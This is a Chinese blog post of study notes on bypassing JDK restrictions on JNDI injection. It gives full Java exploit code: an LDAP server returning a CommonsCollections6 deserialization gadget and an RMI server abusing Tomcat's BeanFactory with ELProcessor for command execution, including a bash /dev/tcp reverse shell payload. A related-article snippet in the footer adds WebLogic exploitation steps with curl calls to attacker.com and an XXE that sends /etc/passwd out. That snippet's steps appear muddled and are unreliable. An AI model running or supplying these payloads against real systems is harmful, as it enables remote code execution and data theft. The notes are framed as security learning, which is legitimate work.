JNDI注入高版本绕过学习

于 2023-09-06 11:36:31 发布
阅读量163 收藏
点赞数
文章标签: 学习 java tomcat struts spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/why811/article/details/132711773
版权

JNDI(Java Naming and Directory Interface)是一个应用程序设计的 API,一种标准的 Java 命名系统接口。JNDI 提供统一的客户端 API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将 JNDI API 映射为特定的命名服务和目录系统,使得 Java 应用程序可以和这些命名服务和目录服务之间进行交互。

协议作用
LDAP轻量级目录访问协议,约定了 Client 与 Server 之间的信息交互格式、使用的端口号、认证方式等内容
RMIJAVA 远程方法协议,该协议用于远程调用应用程序编程接口,使客户机上运行的程序可以调用远程服务器上的对象
DNS域名服务
CORBA公共对象请求代理体系结构

高版本绕过主要有两种方式:

  • LDAP Server 直接返回恶意序列化数据,但需要目标环境存在 Gadget 依赖
  • 使用本地 Factory 绕过(主要是利用了 org.apache.naming.facotry.BeanFactory 类)

直接返回序列化数据

利用

LDAP Server 可以直接改 marshalsec 里面的:

public class LDAPServer {

    private static final String LDAP_BASE = "dc=example,dc=com";

    public static void main(String[] args) {
        String[] tmpArgs = new String[]{"http://localhost:9999/#Calc"};
        int port = 8888;
        try {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
            config.setListenerConfigs(new InMemoryListenerConfig(
                    "listen", //$NON-NLS-1$
                    InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$
                    port,
                    ServerSocketFactory.getDefault(),
                    SocketFactory.getDefault(),
                    (SSLSocketFactory) SSLSocketFactory.getDefault()));

            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(tmpArgs[0])));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
            ds.startListening();

        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    private static class OperationInterceptor extends InMemoryOperationInterceptor {

        private URL codebase;


        /**
         *
         */
        public OperationInterceptor(URL cb) {
            this.codebase = cb;
        }


        /**
         * {@inheritDoc}
         *
         * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)
         */
        @Override
        public void processSearchResult(InMemoryInterceptedSearchResult result) {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try {
                sendResult(result, base, e);
            } catch (Exception e1) {
                e1.printStackTrace();
            }

        }


        protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e) throws Exception {
            URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
            System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
            e.addAttribute("javaClassName", "foo");
            String cbstring = this.codebase.toString();
            int refPos = cbstring.indexOf('#');
            if (refPos > 0) {
                cbstring = cbstring.substring(0, refPos);
            }
            /*
            e.addAttribute("javaCodeBase", cbstring);
            e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$
            e.addAttribute("javaFactory", this.codebase.getRef());
             */

            // send serial data
            e.addAttribute("javaSerializedData", getCommonsCollections6());
            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        }

        static byte[] getCommonsCollections6() throws Exception {
            TemplatesImpl templates = Utils.creatTemplatesImpl(Calc.class);
            Transformer invokerTransformer = new InvokerTransformer("getClass", null, null);
            Map innerMap = new HashMap();
            Map outerMap = LazyMap.decorate(innerMap, invokerTransformer);
            TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, templates);
            HashMap expMap = new HashMap();
            expMap.put(tiedMapEntry, "value");
            outerMap.clear();
            Utils.setFieldValue(invokerTransformer, "iMethodName", "newTransformer");

            return Utils.serialize(expMap);
        }

    }
}
> javac Calc.java
> python3 -m http.server 9999

客户端 lookup 方法参数可控:

简单分析

(ObjectInputStream#readObject --> ... --> Runtime.getRuntime.exec('calc'))
deserializeObject:528, Obj (com.sun.jndi.ldap)
decodeObject:239, Obj (com.sun.jndi.ldap)
c_lookup:1051, LdapCtx (com.sun.jndi.ldap)
p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx)
lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx)
lookup:205, GenericURLContext (com.sun.jndi.toolkit.url)
lookup:94, ldapURLContext (com.sun.jndi.url.ldap)
lookup:417, InitialContext (javax.naming)
main:8, JNDIClient (JNDI.bypass1)

Obj#decodeObject 方法里:

如果 var0.JAVA_ATTRIBUTES[1] 不为 null,则会进入 Obj#deserializeObject 方法中去,我们来看 JAVA_ATTRIBUTES 的定义:

static final String[] JAVA_ATTRIBUTES = new String[]{"objectClass", "javaSerializedData", "javaClassName", "javaFactory", "javaCodeBase", "javaReferenceAddress", "javaClassNames", "javaRemoteLocation"};

对应下标为 1 的是 javaSerizlizedData,而这里的 var0 是 LDAP 服务端发送的 Attributes(可控),所以在服务端把这个属性和恶意的序列化数据绑定:

// LDAP Server

e.addAttribute("javaSerializedData", getCommonsCollections6());

然后进入 Obj#deserializeObject 方法,直接进行了反序列化:

本地 Factory 绕过

在 Reference 类中的 factory Class,要求实现 ObjectFactory 接口,在 "NamingManager#getObjectFactoryFromReference" 方法中的逻辑是这样的:

  1. 优先从本地加载 factory,这就要求 factory Class 在本地的 ClassPath 中
  2. 本地加载不到会从 codebase 处加载,但是由于高版本 jdk 默认不信任 codebase,在一般情况下无法利用
  3. 在加载完 factory 之后会强制类型转换为 javax.naming.spi.ObjectFactory 接口类型,之后调用 factory.getObjectInstance() 方法

所以如果找可以利用的 factory 就要满足下面的要求:

  • 在目标的 ClassPath 中,且实现了 javax.naming.spi.ObjectFactory 接口
  • getObjectInstance 方法可以被利用

这个可用的 factory 类为 org.apache.naming.BeanFactory,位于 tomcat 的依赖包中,此外,这个 factory 绕过需要搭配 javax.el.ELProcessor 来完成 RCE,依赖:

<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-catalina</artifactId>
    <version>8.5.0</version>
</dependency>

<!-- 加载ELProcessor时需要 -->
<dependency>
    <groupId>org.apache.tomcat.embed</groupId>
    <artifactId>tomcat-embed-el</artifactId>
    <version>8.5.0</version>
</dependency>

分析

来到 BeanFactory#getObjectInstance 方法中(太长不放图了- -)

这里的代码逻辑比较复杂,简单可以概括为以下几点:

  • BeanFactory#getObjectInstance 要求传入了 Reference 必须为 ResourceRef 的实例
  • BeanFactory 通过反射创建了一个 Bean,这个 Bean 的类名、属性、属性值都来自于 Reference 对象,我们可控
  • 在注入 Bean 的属性的时候会调用对应的 setter 方法,这个 setter 方法不一定为 set... 形式,通过 ResourceRef 对象中的一个魔法属性 forceString ,可以把任意 public 方法转化为该属性 setter 方法。
  • 这个 public 方法的参数类型必须为 String.class

可以利用的方法为 javax.el.ELProceor#eval 方法,这个方法可以执行任意的 EL 表达式。

Expliot

EL 表达式利用 JS 引擎执行命令:

String el = "''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','calc']).start()\")";
// 反弹shell
String el = "''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/bash','-c','bash -i >& /dev/tcp/ip/port 0>&1']).start()\")";
public class RMIServer {
    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.createRegistry(1099);
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
        StringRefAddr sr1 = new StringRefAddr("forceString", "X=eval");
        String el = "''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','calc']).start()\")";
        StringRefAddr sr2 = new StringRefAddr("X", el);
        ref.add(sr1);
        ref.add(sr2);
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
        registry.bind("pwn", referenceWrapper);
    }
}
public class JNDIClient {
    public static void main(String[] args) throws Exception {
        String url = "rmi://localhost:1099/pwn";
        InitialContext context = new InitialContext();
        context.lookup(url);
    }
}

扩展

InitialContext类

由 JNDI+RMI 漏洞代码进行分析

package jndi_rmi_injection;

import javax.naming.InitialContext;
import javax.naming.NamingException;
public class RMIClient {
    public static void main(String[] args) throws NamingException{
        String uri = "rmi://127.0.0.1:7778/RCE";
        InitialContext initialContext = new InitialContext();
        initialContext.lookup(uri);
    }
}

InitialContext 类用于读取 JNDI 的一些配置信息,内含对象和其在 JNDI 中的注册名称的映射信息

InitialContext initialContext = new InitialContext(); // 初始化上下文,获取初始目录环境的一个引用

lookup(String name) 获取 name 的数据,这里的 uri 被定义为 rmi://127.0.0.1:7778/RCE 所以会通过 rmi 协议访问 127.0.0.1:7778/RCE

String uri = "rmi://127.0.0.1:7778/RCE";
initialContext.lookup(uri); //利用lookup() 函数获取指定的远程对象

由于 lookup() 参数可控,导致漏洞的出现,跟进代码如下

Reference 类

Reference 是一个抽象类,每个 Reference 都有一个指向的对象,对象指定类会被加载并实例化。
由 JNDI+RMI 服务端攻击代码

package jndi_rmi_injection;

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import javax.naming.Reference;
import com.sun.jndi.rmi.registry.ReferenceWrapper;

public class RMIServer {
    public static void main(String[] args) throws Exception{
        Registry registry = LocateRegistry.createRegistry(7778);
        Reference reference = new Reference("Calculator","Calculator","http://127.0.0.1:8081/");
        ReferenceWrapper wrapper = new ReferenceWrapper(reference);
        registry.bind("RCE",wrapper);
    }

}

reference 指定了一个 Calculator 类,于远程的 http://127.0.0.1:8081/ 服务端上,等待客户端的调用并实例化执行。

Reference reference = new Reference("Calculator","Calculator","http://127.0.0.1:8081/");

why811
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JNDI注入学习1
08-03
JNDI 注简单来说就是在 JNDI 接在初始化时,如: InitialContext.lookup(URI) ,如果URI 可控,那么客户端就可能会被攻击通过
java基础(部分)
一个菜鸡程序员的学习之路
07-26 330
Java详细入门笔记,涵盖Java基础知识点
java安全入门(四)——JNDI入门指北
weixin_45808483的博客
02-14 4249
前言 log4j2 宛如过年一般,趁此机会对没理清的 JNDI 协议仔细再捋一捋 log4j的payload很好记:${jndi:ldap/rmi://xxxxxx/exp} 那么,我们就需要研究一下是怎么来的。 首先来看rpc RPC RPC即 Remote Procedure Call(远程过程调用),==是一种技术思想而并非一种规范的协议==,是一种通过网络从远程计算机请求服务的过程。 常见 RPC 技术和框架有: 应用级的服务框架:阿里的 Dubbo/Dubbox、Google
绕过版本JDK限制的JNDI注入
weixin_45682070的博客
01-21 1626
前言 JNDI_RMI在JDK 6u132, JDK 7u122, JDK 8u113版本中,系统属性 com.sun.jndi.rmi.object.trustURLCodebase;com.sun.jndi.cosnaming.object.trustURLCodcbase 的默认值变为false,即默认不允许从远程的Codebase加载Reference工厂类。 JNDI_LDAP在Oracle JDK 6u211、7u201、8u191、11.0.1、之后 com.sun.jndi.ldap.obj
JNDI注入+版本绕过+工具使用
GalaxySpaceX的博客
06-21 2077
JNDI注入+版本绕过+工具使用
JNDI注入利用原理绕过版本JDK限制
mole_exp的博客
11-07 7086
文章目录前言JNDI 101什么是JNDI使用JNDI的好处几个简单的JNDI代码示例1、使用JNDI操作RMI2、使用JNDI操作LDAPJNDI动态协议转换JNDI Naming ReferencesJNDI 注入利用RMI向量LDAP向量其他向量绕过版本JDK限制方式1、利用本地Class作为JNDI Reference Factory方式2、LDAP Server返回序列化数据,触发本地反序列化Gadget坑Reference 前言 关于JNDI注入的讨论和研究,起源于国外的安全研究员@pwnte
版本JDK下绕过受限JNDI注入进行任意类加载
qq_40466372的博客
07-18 1106
版本JDK下JNDI配合Unsafe实现加载任意类
JNDI注入版本绕过
yangyangrenren的专栏
12-22 1581
转载于JNDI注入版本绕过 JDNI利用方式的修复之路 RMI Remote Object Payload(限制多,不常使用) 攻击者实现一个RMI恶意远程对象并绑定到RMI Registry上,编译后的RMI远程对象类可以放在HTTP/FTP/SMB等服务器上,供受害者的RMI客户端远程加载。RMI客户端在 lookup() 的过程中,会先尝试在本地CLASSPATH中去获取对应的Stub类的定义,并从本地加载,然而如果在本地无法找到,RMI客户端则会向远程Codebase去获取攻击者指定的恶意对象,这
Java反序列化(之)JNDI注入绕过版本限制
Vicl1fe的博客
12-30 920
前言 JNDI注入绕过版本限制已经被别人玩烂了,我才开始学。参考文章写的特别好。 本文大部分参考https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html JNDI注入 暂时只了解到 JNDI注入分为如下几类 RMI Remote Object Payload(限制较多,不常使用) RMI + JNDI Reference Payload LDAP + JNDI Reference Payload CORBA攻击
Java安全』绕过JDK版本限制进行JNDI注入学习研究
Ho1aAs‘s Blog
02-22 2629
文章目录绕过原理使用本地类作为恶意工厂攻击RMI探究BeanFactory类pom.xmlPoCjavax.el.ELProcessorGroovy.lang.GroovyShell引用参考完 绕过原理 对于JDK版本11.0.1、8u191、7u201、6u211及以上,RMI和LDAP的trustURLCodebase已经被限制,但是还存在几种方法绕过 使用受害者本地的类作为恶意Reference Factory攻击RMI 利用LDAP返回序列化数据触发Gadget 使用本地类作为恶意工厂攻击RMI
JNDI:JNDI注入利用工具
03-21
JNDI注入利用工具 介绍 本项目为JNDI注入利用工具,生成JNDI连接并启动初始化相关服务,可用于Fastjson,Jackson等相关突破的验证。 本项目是基于welk1n的 ,在此项目的基础服务框架上,重新编写了攻击利用代码,...
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar JNDIExploit.jar -...
JNDIExploit-用于 JNDI注入利用的工具
04-16
一款用于 JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接植入内存shell,并集成了常见的bypass 版本JDK的方式,适用于与自动化工具配合使用。 使用 java -jar JNDIExploit.jar -h 查看参数...
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器,LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器和LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用...
[转载]在 Apache 目录服务器中存储 Java 对象,第 2 部分
congji3817的博客
06-25 129
在 Apache 目录服务器中存储 Java 对象,第 2 部分在第 2 部分中将介绍如何在 Apache 目录服务器 (ApacheDS) 中存储 Java™ 对象,Bilal Siddiqui 将提供 9 个示例应用程序,演...
JAVA常用单词汇总
悟空非空也
07-06 8351
Java 常用英语汇总 abstract (关键字) access 抽象 ['.bstr.kt] vt.访问,存取 ['.kses]'(n.入口,使用权) n.算法 ['.lg.riem] algorithm annotation anonymous [java]代码注释 [.n.u'tei..n] adj.匿名的[.'n.nim.s]' (反义:directly adv.直接地,立即[di'...
[Java安全]JDK8u191之后的JNDI注入绕过(javax.el.ELProcessor依赖)
Y4tacker的博客
10-13 2406
文章目录环境Maven依赖利用分析低版本流程分析JDK8u191之后的JNDI注入绕过参考文章 环境 我们知道在JDK 6u211、7u201、8u191、11.0.1之后,增加了com.sun.jndi.ldap.object.trustURLCodebase选项,默认为false,禁止LDAP协议使用远程codebase的选项,把LDAP协议的攻击途径也给禁了 切换到8u191之后就好了,我这里随便选择了8u201 Maven依赖 <dependency> <groupId&
tomcat下jdk版本JNDI注入解析
b1ackc4t的博客
03-12 492
前言 经典的JNDI注入在jdk8u191以上的版本默认被限制了加载远程工厂类,但可以通过加载一些特殊的本地工厂,达到执行命令的效果 比如常见的tomcat依赖里的BeanFactory就能实现类似的效果 经典payload 服务端 package org.example.rmi; import com.sun.jndi.rmi.registry.ReferenceWrapper; import javax.naming.NamingException; import javax.naming.Refe
JNDI注入版本绕过——实验分析
yangyangrenren的专栏
12-22 2578
原文是: JNDI注入版本绕过 JNDI注入版本绕过 对文章中的“利用LDAP返回序列化数据,触发本地Gadget绕过版本限制”内容,LDAP_Server代码做实验,其原理就是:启动了一个内存LDAP数据库。 LDAP内存数据库验证: 可以采用两种方式验证,方式一是借助Apache Directory Studio软件,与内存LDAP数据库建立连接。方式二是使用代码读取。 (1) 方式一 (2)方式二 import javax.naming.Context; import javax.nami
weblogic jndi注入漏洞利用
最新发布
12-11
WebLogic 的/console/consolejndi.portal接口可以调用存在 JNDI 注入漏洞的com.bea.console.handles.JndiBindingHandle类,从而造成 RCE。攻击者可以通过构造恶意请求,将攻击者控制的 JNDI 对象绑定到 WebLogic JNDI 树上,从而实现远程代码执行。具体步骤如下: 1. 构造恶意请求,将攻击者控制的 JNDI 对象绑定到 WebLogic JNDI 树上。例如,可以使用以下命令将一个恶意的 LDAP URL 绑定到 WebLogic JNDI 树上: ``` curl -v -X POST -H 'Content-Type: application/json' -d '{"name": "ldap://attacker.com:1389/Exploit", "targets": [{"identity": {"type": "Server", "name": "AdminServer"}}]}' http://<WebLogic_IP>:<WebLogic_Port>/console/consolejndi.portal ``` 2. 构造恶意请求,触发 JNDI 注入漏洞。例如,可以使用以下命令触发漏洞: ``` curl -v -X POST -H 'Content-Type: application/json' -d '{"name": "Exploit", "bindings": [{"name": "Exploit", "type": "javax.naming.Reference", "value": {"className": "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext", "factoryClassName": "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext", "factoryMethodName": "setConfigLocation", "factoryMethodArgs": ["http://attacker.com/evil.xml"]}}]}' http://<WebLogic_IP>:<WebLogic_Port>/console/consolejndi.portal ``` 3. 在攻击者控制的服务器上,启动一个 HTTP 服务器,将恶意的 XML 文件放到该服务器上。例如,可以使用以下命令启动一个 Python HTTP 服务器: ``` python -m SimpleHTTPServer 80 ``` 4. 构造恶意的 XML 文件,该文件将在 WebLogic 服务器上执行恶意代码。例如,可以使用以下 XML 文件: ``` <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]> ``` 5. 在攻击者控制的服务器上,启动一个 HTTP 服务器,将恶意的 DTD 文件放到该服务器上。例如,可以使用以下命令启动一个 Python HTTP 服务器: ``` python -m SimpleHTTPServer 80 ``` 6. 构造恶意的 DTD 文件,该文件将在 WebLogic 服务器上执行恶意代码。例如,可以使用以下 DTD 文件: ``` <!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % remote "<!ENTITY % send SYSTEM 'http://attacker.com/?%payload;'>"> %remote; ``` 7. 等待 WebLogic 服务器向攻击者控制的服务器发送 HTTP 请求,从而触发恶意代码的执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值